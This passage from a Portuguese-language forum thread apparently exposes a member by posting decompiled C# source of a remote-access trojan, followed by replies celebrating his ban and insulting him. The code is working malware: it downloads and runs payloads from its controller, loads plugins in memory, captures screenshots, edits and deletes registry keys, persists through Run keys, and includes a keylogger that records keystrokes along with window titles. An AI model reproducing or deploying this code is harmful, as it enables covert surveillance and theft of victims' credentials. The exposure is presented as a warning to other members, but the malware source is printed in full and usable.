            OK.Send(str2 + OK.H + ":" + OK.P + OK.Y + OK.DR + OK.Y + OK.EXE + OK.Y + Process.GetCurrentProcess().ProcessName);
        } else if (Operators.CompareString(Left1, "prof", false) == 0) {
            // Settings stored in the HKCU "Software" + RG key.
            string Left2 = strArray1[1];
            if (Operators.CompareString(Left2, "~", false) == 0)
                OK.STV(strArray1[2], strArray1[3]);
            else if (Operators.CompareString(Left2, "!", false) == 0) {
                OK.STV(strArray1[2], strArray1[3]);
                OK.Send("getvalue" + OK.Y + strArray1[1] + OK.Y + OK.GTV(strArray1[1]));
            } else {
                if (Operators.CompareString(Left2, "@", false) != 0)
                    return;
                OK.DLV(strArray1[2]);
            }
        } else if (Operators.CompareString(Left1, "rn", false) == 0) {
            // Drop-and-run: field 2 is either Base64 of a gzip blob or a URL starting with "http";
            // the bytes are written to %temp% as <10 random lowercase letters>.<field 1> and started.
            byte[] bytes;
            if (!strArray1[2].ToLower().StartsWith("http")) {
                try {
                    byte[] B = Convert.FromBase64String(strArray1[2]);
                    bool flag = false;
                    // ISSUE: explicit reference operation
                    // ISSUE: variable of a reference type
                    bool& CM = @flag;
                    bytes = OK.ZIP(B, CM);
                } catch (Exception ex) {
                    ProjectData.SetProjectError(ex);
                    OK.Send("MSG" + OK.Y + "Execute ERROR");
                    OK.Send("bla");
                    ProjectData.ClearProjectError();
                    return;
                }
            } else {
                WebClient webClient = new WebClient();
                try {
                    bytes = webClient.DownloadData(strArray1[2]);
                } catch (Exception ex) {
                    ProjectData.SetProjectError(ex);
                    OK.Send("MSG" + OK.Y + "Download ERROR");
                    OK.Send("bla");
                    ProjectData.ClearProjectError();
                    return;
                }
            }
            OK.Send("bla");
            string str = Interaction.Environ("temp") + "" + OK.RN(10) + "." + strArray1[1];
            System.IO.File.WriteAllBytes(str, bytes);
            Process.Start(str);
            OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(str).Name);
        } else if (Operators.CompareString(Left1, "inv", false) == 0) {
            // Module load: uses the copy cached in the settings key under the name in field 1 when
            // present, otherwise decodes/decompresses field 3 and caches it (Base64) under that
            // name. The assembly is loaded from memory via Plugin(), given h/p/osk, started, and
            // this thread then polls until the link drops or the module reports "Off".
            OK.Send("bla");
            string s = OK.GTV(strArray1[1]);
            byte[] numArray;
            if (s.Length > 0) {
                numArray = Convert.FromBase64String(s);
                OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0));
            } else if (strArray1[3].Length == 1) {
                OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + "False");
                return;
            } else {
                byte[] B = Convert.FromBase64String(strArray1[3]);
                bool flag = false;
                // ISSUE: explicit reference operation
                // ISSUE: variable of a reference type
                bool& CM = @flag;
                numArray = OK.ZIP(B, CM);
                if (Conversions.ToBoolean(OK.STV(strArray1[1], Convert.ToBase64String(numArray))))
                    OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0));
            }
            object objectValue = RuntimeHelpers.GetObjectValue(OK.Plugin(numArray, "A"));
            NewLateBinding.LateSet(objectValue, (System.Type) null, "h", new object[1] { (object) OK.H }, (string[]) null, (System.Type[]) null);
            NewLateBinding.LateSet(objectValue, (System.Type) null, "p", new object[1] { (object) OK.P }, (string[]) null, (System.Type[]) null);
            NewLateBinding.LateSet(objectValue, (System.Type) null, "osk", new object[1] { (object) strArray1[2] }, (string[]) null, (System.Type[]) null);
            NewLateBinding.LateCall(objectValue, (System.Type) null, "start", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
            while (!Conversions.ToBoolean(Operators.OrObject((object) (bool) (!OK.Cn ? 1 : 0), Operators.CompareObjectEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Off", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) true, false))))
                Thread.Sleep(1);
            NewLateBinding.LateSet(objectValue, (System.Type) null, "off", new object[1] { (object) true }, (string[]) null, (System.Type[]) null);
        } else if (Operators.CompareString(Left1, "ret", false) == 0) {
            // Same load/cache path as "inv" (payload in field 2), but the module's "GT" member is
            // read once and its value returned Base64-encoded.
            OK.Send("bla");
            string s1 = OK.GTV(strArray1[1]);
            byte[] numArray;
            if (s1.Length > 0) {
                numArray = Convert.FromBase64String(s1);
                OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0));
            } else if (strArray1[2].Length == 1) {
                OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + "True");
                return;
            } else {
                byte[] B = Convert.FromBase64String(strArray1[2]);
                bool flag = false;
                // ISSUE: explicit reference operation
                // ISSUE: variable of a reference type
                bool& CM = @flag;
                numArray = OK.ZIP(B, CM);
                if (Conversions.ToBoolean(OK.STV(strArray1[1], Convert.ToBase64String(numArray))))
                    OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0));
            }
            object objectValue = RuntimeHelpers.GetObjectValue(OK.Plugin(numArray, "A"));
            string[] strArray2 = new string[5] { "ret", OK.Y, strArray1[1], OK.Y, null };
            string[] strArray3 = strArray2;
            int index = 4;
            string s2 = Conversions.ToString(NewLateBinding.LateGet(objectValue, (System.Type) null, "GT", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
            string str = OK.ENB(ref s2);
            strArray3[index] = str;
            OK.Send(string.Concat(strArray2));
        } else if (Operators.CompareString(Left1, "CAP", false) == 0) {
            // Screenshot: copies the primary screen (13369376 = 0x00CC0020, SourceCopy), draws the
            // cursor, scales to the width/height given in fields 1 and 2, encodes as JPEG and sends
            // it after a "CAP" + Y header. If the MD5 equals the previous capture a single 0 byte
            // is sent instead of the image.
            int width = Screen.PrimaryScreen.Bounds.Width;
            Rectangle bounds = Screen.PrimaryScreen.Bounds;
            int height = bounds.Height;
            Bitmap bitmap = new Bitmap(width, height);
            Graphics graphics1 = Graphics.FromImage((Image) bitmap);
            Graphics graphics2 = graphics1;
            int sourceX = 0;
            int sourceY = 0;
            int destinationX = 0;
            int destinationY = 0;
            Size size1 = new Size(bitmap.Width, bitmap.Height);
            Size blockRegionSize = size1;
            int num = 13369376;
            graphics2.CopyFromScreen(sourceX, sourceY, destinationX, destinationY, blockRegionSize, (CopyPixelOperation) num);
            try {
                Cursor @default = Cursors.Default;
                Graphics g = graphics1;
                // ISSUE: explicit reference operation
                // ISSUE: variable of a reference type
                Rectangle& local = @bounds;
                Point position = Cursor.Position;
                size1 = new Size(32, 32);
                Size size2 = size1;
                // ISSUE: explicit reference operation
                ^local = new Rectangle(position, size2);
                Rectangle targetRect = bounds;
                @default.Draw(g, targetRect);
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
            graphics1.Dispose();
            MemoryStream memoryStream1 = new MemoryStream();
            string S = "CAP" + OK.Y;
            b = OK.SB(ref S);
            memoryStream1.Write(b, 0, b.Length);
            MemoryStream memoryStream2 = new MemoryStream();
            IntPtr callbackData;
            bitmap.GetThumbnailImage(Conversions.ToInteger(strArray1[1]), Conversions.ToInteger(strArray1[2]), (Image.GetThumbnailImageAbort) null, callbackData).Save((Stream) memoryStream2, ImageFormat.Jpeg);
            string md5Hash = OK.getMD5Hash(memoryStream2.ToArray());
            if (Operators.CompareString(md5Hash, OK.lastcap, false) != 0) {
                OK.lastcap = md5Hash;
                memoryStream1.Write(memoryStream2.ToArray(), 0, checked ((int) memoryStream2.Length));
            } else
                memoryStream1.WriteByte((byte) 0);
            OK.Sendb(memoryStream1.ToArray());
            memoryStream1.Dispose();
            memoryStream2.Dispose();
            bitmap.Dispose();
        } else if (Operators.CompareString(Left1, "P", false) == 0)
            // Keep-alive echo.
            OK.Send("P");
        else if (Operators.CompareString(Left1, "un", false) == 0) {
            // "~" calls UNS() (defined outside this excerpt); "!" exits; "@" restarts the executable.
            // Both exit paths call pr(0) first.
            string Left2 = strArray1[1];
            if (Operators.CompareString(Left2, "~", false) == 0)
                OK.UNS();
            else if (Operators.CompareString(Left2, "!", false) == 0) {
                OK.pr(0);
                ProjectData.EndApp();
            } else {
                if (Operators.CompareString(Left2, "@", false) != 0)
                    return;
                OK.pr(0);
                Process.Start(OK.LO.FullName);
                ProjectData.EndApp();
            }
        } else if (Operators.CompareString(Left1, "up", false) == 0) {
            // Self-update: payload from Base64+gzip or an "http" URL in field 1 is written to
            // %temp% as <10 random lowercase letters>.exe and started with the argument
            // "UP:<current pid>". The HKCU value "di" is cleared first; for roughly 5 s
            // (501 polls, 10 ms apart) it is checked for "!" and UNS() is called when seen.
            byte[] bytes;
            if (!strArray1[1].ToLower().StartsWith("http")) {
                try {
                    byte[] B = Convert.FromBase64String(strArray1[1]);
                    bool flag = false;
                    // ISSUE: explicit reference operation
                    // ISSUE: variable of a reference type
                    bool& CM = @flag;
                    bytes = OK.ZIP(B, CM);
                } catch (Exception ex) {
                    ProjectData.SetProjectError(ex);
                    OK.Send("MSG" + OK.Y + "Update ERROR");
                    OK.Send("bla");
                    ProjectData.ClearProjectError();
                    return;
                }
            } else {
                WebClient webClient = new WebClient();
                try {
                    bytes = webClient.DownloadData(strArray1[1]);
                } catch (Exception ex) {
                    ProjectData.SetProjectError(ex);
                    OK.Send("MSG" + OK.Y + "Update ERROR");
                    OK.Send("bla");
                    ProjectData.ClearProjectError();
                    return;
                }
            }
            OK.Send("bla");
            OK.F.Registry.CurrentUser.SetValue("di", (object) "");
            string str = Interaction.Environ("temp") + "" + OK.RN(10) + ".exe";
            System.IO.File.WriteAllBytes(str, bytes);
            OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(str).Name);
            Process.Start(str, "UP:" + Conversions.ToString(Process.GetCurrentProcess().Id));
            int num = 0;
            do {
                Thread.Sleep(10);
                if (Operators.ConditionalCompareObjectEqual(OK.F.Registry.CurrentUser.GetValue("di", (object) ""), (object) "!", false))
                    OK.UNS();
                checked { ++num; }
            } while (num <= 500);
        } else {
            if (Operators.CompareString(Left1, "RG", false) != 0)
                return;
            // Registry access on the key named in field 2 (opened writable by GetKey):
            // "~" list subkeys and values, "!" set a value, "@" delete a value,
            // "#" create a subkey, "$" delete a subkey tree.
            RegistryKey key = OK.GetKey(strArray1[2]);
            string Left2 = strArray1[1];
            if (Operators.CompareString(Left2, "~", false) == 0) {
                string str1 = "RG" + OK.Y + "~" + OK.Y + strArray1[2] + OK.Y;
                string str2 = "";
                string[] subKeyNames = key.GetSubKeyNames();
                int index1 = 0;
                while (index1 < subKeyNames.Length) {
                    string str3 = subKeyNames[index1];
                    if (!str3.Contains(""))
                        str2 = str2 + str3 + OK.Y;
                    checked { ++index1; }
                }
                string[] valueNames = key.GetValueNames();
                int index2 = 0;
                while (index2 < valueNames.Length) {
                    string name = valueNames[index2];
                    str2 = str2 + name + "/" + key.GetValueKind(name).ToString() + "/" + key.GetValue(name, (object) "").ToString() + OK.Y;
                    checked { ++index2; }
                }
                OK.Send(str1 + str2);
            } else if (Operators.CompareString(Left2, "!", false) == 0)
                key.SetValue(strArray1[3], (object) strArray1[4], (RegistryValueKind) Conversions.ToInteger(strArray1[5]));
            else if (Operators.CompareString(Left2, "@", false) == 0)
                key.DeleteValue(strArray1[3], false);
            else if (Operators.CompareString(Left2, "#", false) == 0) {
                key.CreateSubKey(strArray1[3]);
            } else {
                if (Operators.CompareString(Left2, "$", false) != 0)
                    return;
                key.DeleteSubKeyTree(strArray1[3]);
            }
        }
    } catch (Exception ex1) {
        ProjectData.SetProjectError(ex1);
        Exception exception = ex1;
        try {
            OK.Send("ER" + OK.Y + strArray1[0] + OK.Y + exception.Message);
        } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); }
        ProjectData.ClearProjectError();
    }
}

// Lowercase hex MD5 of B. Used only to detect an unchanged screenshot, not as a security control.
public static string getMD5Hash(byte[] B) {
    B = new MD5CryptoServiceProvider().ComputeHash(B);
    string str = "";
    byte[] numArray = B;
    int index = 0;
    while (index < numArray.Length) {
        byte num = numArray[index];
        str = str + num.ToString("x2");
        checked { ++index; }
    }
    return str;
}

// Maps a full registry path to a writable RegistryKey by matching its hive
// prefix (ClassesRoot, CurrentUser, LocalMachine, Users). Returns null for any
// other prefix.
public static RegistryKey GetKey(string key) {
    if (key.StartsWith(OK.F.Registry.ClassesRoot.Name)) {
        string name = key.Replace(OK.F.Registry.ClassesRoot.Name + "", "");
        return OK.F.Registry.ClassesRoot.OpenSubKey(name, true);
    } else if (key.StartsWith(OK.F.Registry.CurrentUser.Name)) {
        string name = key.Replace(OK.F.Registry.CurrentUser.Name + "", "");
        return OK.F.Registry.CurrentUser.OpenSubKey(name, true);
    } else if (key.StartsWith(OK.F.Registry.LocalMachine.Name)) {
        string name = key.Replace(OK.F.Registry.LocalMachine.Name + "", "");
        return OK.F.Registry.LocalMachine.OpenSubKey(name, true);
    } else {
        if (!key.StartsWith(OK.F.Registry.Users.Name))
            return (RegistryKey) null;
        string name = key.Replace(OK.F.Registry.Users.Name + "", "");
        return OK.F.Registry.Users.OpenSubKey(name, true);
    }
}

// Calls NtSetInformationProcess on the current process with information class
// 29 and a 4-byte value `i`. Class 29 (0x1D) is ProcessBreakOnTermination in
// the NT headers, the "critical process" flag; every call visible in this
// excerpt passes 0. NOTE(review): where the flag is set is not shown here.
public static void pr(int i) {
    try {
        OK.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i, 4);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
}

// Sends one framed message: payload bytes followed by SPL ("[endof]") in a
// single socket send, serialized by a monitor on LO. Returns false when not
// connected; on a send error the socket is closed and Cn is cleared.
// The payload is sent as-is: no encryption or authentication is applied here,
// so the Y/SPL markers are visible on the wire.
public static bool Sendb(byte[] b) {
    if (!OK.Cn)
        return false;
    FileInfo fileInfo = OK.LO;
    Monitor.Enter((object) fileInfo);
    bool flag;
    try {
        if (!OK.Cn) {
            flag = false;
        } else {
            try {
                MemoryStream memoryStream = new MemoryStream();
                memoryStream.Write(b, 0, b.Length);
                memoryStream.Write(OK.SB(ref OK.SPL), 0, OK.SPL.Length);
                OK.C.Client.Send(memoryStream.ToArray(), 0, checked ((int) memoryStream.Length), SocketFlags.None);
                memoryStream.Dispose();
                flag = true;
            } catch (Exception ex1) {
                ProjectData.SetProjectError(ex1);
                try {
                    if (OK.Cn)
                        OK.C.Close();
                } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); }
                OK.Cn = false;
                flag = false;
                ProjectData.ClearProjectError();
            }
        }
    } finally {
        Monitor.Exit((object) fileInfo);
    }
    return flag;
}

// String overload of Sendb (Encoding.Default bytes).
public static bool Send(string S) { return OK.Sendb(OK.SB(ref S)); }

// (Re)establishes the session: tears down any previous socket, receive buffer
// and shell child, waits 1 s, connects to H:P over TCP and immediately sends
// the inf() check-in. Returns the resulting value of Cn.
public static bool connect() {
    FileInfo fileInfo = OK.LO;
    Monitor.Enter((object) fileInfo);
    bool flag;
    try {
        try {
            if (OK.C != null) {
                try {
                    OK.C.Client.Disconnect(false);
                } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
                try {
                    OK.C.Close();
                    OK.C = (TcpClient) null;
                } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
            }
            try {
                OK.MeM.Dispose();
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
            OK.MeM = new MemoryStream();
            try {
                if (OK.Pro != null) {
                    OK.Pro.Kill();
                    OK.Pro = (Process) null;
                }
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
        } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
        try {
            OK.C = new TcpClient();
            Thread.Sleep(1000);
            OK.C.Connect(OK.H, Conversions.ToInteger(OK.P));
            OK.Cn = true;
            OK.Send(OK.inf());
            flag = OK.Cn;
        } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Cn = false; flag = false; ProjectData.ClearProjectError(); }
    } finally {
        Monitor.Exit((object) fileInfo);
    }
    return flag;
}

// RC: the body continues beyond this excerpt.
public static void RC() { while
(true) { if (OK.C != null) { try { while (OK.Cn) { if ((uint) OK.C.Available > 0U) { OK.b = new byte[checked (OK.C.Client.Available - 1 + 1)]; int count = OK.C.Client.Receive(OK.b, 0, OK.b.Length, SocketFlags.None); if (count > 0) { OK.MeM.Write(OK.b, 0, count); while (true) { byte[] B = OK.MeM.ToArray(); if (OK.BS(ref B).Contains(OK.SPL)) { Array array = OK.fx(OK.MeM.ToArray(), OK.SPL); Thread thread = new Thread((ParameterizedThreadStart) (a0 => OK.Ind((byte[]) a0))); thread.Start(RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 0 }, (string[]) null))); thread.Join(200); OK.MeM.Dispose(); OK.MeM = new MemoryStream(); if (array.Length == 2) OK.MeM.Write((byte[]) NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 1 }, (string[]) null), 0, Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 1 }, (string[]) null), (System.Type) null, "length", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null))); else break; } else break; } } else break; } else { int num = OK.C.GetStream().ReadByte(); if (num != -1) OK.MeM.WriteByte(checked ((byte) num)); else break; } Thread.Sleep(1); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } do { OK.Cn = false; Thread.Sleep(2500); } while (!OK.connect()); OK.Cn = true; } } public static void UNS() { OK.pr(0); try { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Interaction.Shell("netsh firewall delete allowedprogram "" + OK.LO.FullName + """, AppWinStyle.Hide, false, -1); } catch (Exception ex) { ProjectData.SetProjectError(ex); 
ProjectData.ClearProjectError(); } try { if (OK.FS != null) { OK.FS.Dispose(); System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe"); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.F.Registry.CurrentUser.OpenSubKey("Software", true).DeleteSubKey(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Interaction.Shell("cmd.exe /c ping 127.0.0.1 & del "" + OK.LO.FullName + """, AppWinStyle.Hide, false, -1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } ProjectData.EndApp(); } } } kl.cs (onde está as funções do keylogger) // Type: ClassLibrary1.kl // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.Devices; using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { public class kl { private int LastAV; private string LastAS; private Keys lastKey; public Clock Clock; public string Logs; private Keyboard keyboard; public string LogsPath; public kl() { this.lastKey = Keys.None; this.Clock = new Clock(); this.Logs = ""; this.keyboard = new Keyboard(); this.LogsPath = Application.ExecutablePath + ".tmp"; } [DllImport("user32.dll")] private static int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [MarshalAs(UnmanagedType.LPWStr), Out] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl); [DllImport("user32.dll")] private static bool GetKeyboardState(byte[] lpKeyState); [DllImport("user32.dll")] private static uint MapVirtualKey(uint uCode, uint uMapType); 
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetKeyboardLayout(int dwLayout); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static IntPtr GetForegroundWindow(); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static short GetAsyncKeyState(int vKey); private string AV() { try { IntPtr foregroundWindow = kl.GetForegroundWindow(); int lpdwProcessID; kl.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID); Process processById = Process.GetProcessById(lpdwProcessID); if (!(foregroundWindow.ToInt32() == this.LastAV & Operators.CompareString(this.LastAS, processById.MainWindowTitle, false) == 0 | processById.MainWindowTitle.Length == 0)) { this.LastAV = foregroundWindow.ToInt32(); this.LastAS = processById.MainWindowTitle; return "rnx0001" + this.HM() + " " + processById.ProcessName + " " + this.LastAS + "x0001rn"; } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return ""; } private string HM() { string str; try { str = this.Clock.LocalTime.ToString("yy/MM/dd"); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = "??/??/??"; ProjectData.ClearProjectError(); } return str; } private static string VKCodeToUnicode(uint VKCode) { try { StringBuilder pwszBuff = new StringBuilder(); byte[] lpKeyState = new byte[(int) byte.MaxValue]; if (!kl.GetKeyboardState(lpKeyState)) return ""; uint wScanCode = kl.MapVirtualKey(VKCode, 0U); IntPtr foregroundWindow = kl.GetForegroundWindow(); int lpdwProcessID = 0; IntPtr dwhkl = (IntPtr) kl.GetKeyboardLayout(kl.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID)); kl.ToUnicodeEx(VKCode, wScanCode, lpKeyState, pwszBuff, 5, 0U, dwhkl); return pwszBuff.ToString(); } catch (Exception ex) { ProjectData.SetProjectError(ex); 
ProjectData.ClearProjectError(); } return ((Keys) checked ((int) VKCode)).ToString(); } private string Fix(Keys k) { bool flag = this.keyboard.ShiftKeyDown; if (this.keyboard.CapsLock) flag = !flag; string str; try { Keys keys = k; str = keys == Keys.F1 || keys == Keys.F2 || (keys == Keys.F3 || keys == Keys.F4) || (keys == Keys.F5 || keys == Keys.F6 || (keys == Keys.F7 || keys == Keys.F8)) || (keys == Keys.F9 || keys == Keys.F10 || (keys == Keys.F11 || keys == Keys.F12) || (keys == Keys.End || keys == Keys.Delete || keys == Keys.Back)) ? "[" + k.ToString() + "]" : (keys == Keys.LShiftKey || keys == Keys.RShiftKey || (keys == Keys.Shift || keys == Keys.ShiftKey) || (keys == Keys.Control || keys == Keys.ControlKey || (keys == Keys.RControlKey || keys == Keys.LControlKey)) || keys == Keys.Alt ? "" : (keys != Keys.Space ? (keys == Keys.Return || keys == Keys.Return ? (!this.Logs.EndsWith("[ENTER]rn") ? "[ENTER]rn" : "") : (keys != Keys.Tab ? (!flag ? kl.VKCodeToUnicode(checked ((uint) k)) : kl.VKCodeToUnicode(checked ((uint) k)).ToUpper()) : "[TAP]rn")) : " ")); } catch (Exception ex) { ProjectData.SetProjectError(ex); if (flag) { str = Strings.ChrW((int) k).ToString().ToUpper(); ProjectData.ClearProjectError(); } else { str = Strings.ChrW((int) k).ToString().ToLower(); ProjectData.ClearProjectError(); } } return str; } public void WRK() { try { this.Logs = File.ReadAllText(this.LogsPath); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { int num1 = 0; while (true) { checked { ++num1; } int vKey = 0; do { if ((int) kl.GetAsyncKeyState(vKey) == -32767) { Keys k = (Keys) vKey; string str = this.Fix(k); if (str.Length > 0) { this.Logs = this.Logs + this.AV(); this.Logs = this.Logs + str; } this.lastKey = k; } checked { ++vKey; } } while (vKey <= (int) byte.MaxValue); if (num1 == 1000) { num1 = 0; int num2 = 20480; if (this.Logs.Length > num2) this.Logs = this.Logs.Remove(0, checked (this.Logs.Length - num2)); 
File.WriteAllText(this.LogsPath, this.Logs); } Thread.Sleep(1); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } A.cs (onde está o main e é chamado tudo, com os respectivos exception handlers) // Type: ClassLibrary1.A // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Diagnostics; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { public class A { [sTAThread] public static void main() { if (Interaction.Command() != null) { if (Interaction.Command().Length > 0) { string[] strArray = Strings.Split(Interaction.Command(), ":", -1, CompareMethod.Binary); string Left = strArray[0]; if (Operators.CompareString(Left, "UP", false) == 0) { try { OK.F.Registry.CurrentUser.SetValue("di", (object) "!"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Process processById = Process.GetProcessById(Conversions.ToInteger(strArray[1])); processById.WaitForExit(5000); try { processById.Dispose(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Thread.Sleep(5000); ProjectData.ClearProjectError(); } } else if (Operators.CompareString(Left, "..", false) == 0) Thread.Sleep(5000); } } try { Mutex.OpenExisting(OK.RG); ProjectData.EndApp(); } catch (Exception ex) { ProjectData.SetProjectError(ex); bool createdNew = false; OK.MT = new Mutex(true, OK.RG, out createdNew); if (!createdNew) ProjectData.EndApp(); ProjectData.ClearProjectError(); } OK.INS(); new Thread(new ThreadStart(OK.RC), 1).Start(); try { OK.kq = new kl(); new Thread(new ThreadStart(OK.kq.WRK), 1).Start(); } catch (Exception ex) { 
ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } int num = 0; string Left1 = ""; if (OK.BD) { try { SystemEvents.SessionEnding += (SessionEndingEventHandler) ((a0, a1) => OK.ED()); OK.pr(1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } while (true) { Thread.Sleep(1000); Application.DoEvents(); try { checked { ++num; } if (num == 5) { try { OK.EmptyWorkingSet((long) Process.GetCurrentProcess().Handle); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } if (num > 8) { num = 0; string Right = OK.ACT(); if (Operators.CompareString(Left1, Right, false) != 0) { Left1 = Right; OK.Send("act" + OK.Y + Right); } } if (OK.Isu) { try { if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.CurrentUser.GetValue(OK.sf + "" + OK.RG, (object) ""), (object) (""" + OK.LO.FullName + "" .."), false)) OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.LocalMachine.GetValue(OK.sf + "" + OK.RG, (object) ""), (object) (""" + OK.LO.FullName + "" .."), false)) OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } } Resumindo pastor alemão és um merdas. Frase sempre relembrada após o teu ban permanente: "Haters gonna Haters" - (Grammar Nazi) Pastor Alemão 6 GuiGy123, Sr.Coninhas, HomenDoNorte and 3 others reacted to this Share this post Link to post Share on other sites
õ.Ô FuckingBoSs õ.Ô 1,565 Posted December 26, 2013 Ele já devia estar banido há mais tempo. Eu sei que ele vai voltar e vai fazer outra com outro IP, mas da sua reputação não pode escapar. E para o pessoal que o defendia, vejam como ele é na verdade: ele rouba sempre. Para quem o defendia, agora quero ver as vossas reações. Já sabem: nunca aceitem nada dele, senão podem pôr a vossa segurança em risco. 1 Sr.Coninhas reacted to this
ThatGuyPT 457 Posted December 26, 2013 Para os que me acusavam de infantilidade eu sei muito bem a mente desses putos molestados pelos pais funciona, não guardo rancor e perdoo toda a gente, mas espero que finalmente percebam o grande filho da XXXX que têm andado a defender que não tem outro nome. Orgulho: Share this post Link to post Share on other sites
Guest Morfo2isBack Posted December 26, 2013 Esse jovem devia levar uma multa para aprender a nunca mais cometer crimes. Teve falta de educação parental, só pode. Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 «Esse jovem devia levar uma multa para aprender a nunca mais cometer crimes. Teve falta de educação parental, só pode.» Basta apresentar queixa. Qualquer pessoa que leve o arquivo à esquadra consegue que isso aconteça.
p0w3r0ff 3,795 Posted December 26, 2013 Eu só tenho de agradecer: zelaste pela segurança de todos os membros. Esse miúdo é um parasita, vive com o mal dos outros. Cumprimentos 2 DarkWolf and Henrique Oliveira reacted to this
WєlรнFlαรн 5 Posted December 26, 2013 Finalmente :3333 Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Sem problema, é só reunir todas as provas reveladoras da personalidade deste menino. Há muito tempo que esperava por este momento.
-Ħalloween. 290 Posted December 26, 2013 Tanto tempo a espera... Nem posso acreditar! ISTO SIM FOI UM PRESENTE DE NATAL 1 Khavro reacted to this Share this post Link to post Share on other sites
Auros ( ͡ʘ ͜ʖ ͡ʘ) 172 Posted December 26, 2013 Me emocionei...., caraca velho se fores a policia dou te um pay de 10 xD ;_; XUEGUE Share this post Link to post Share on other sites
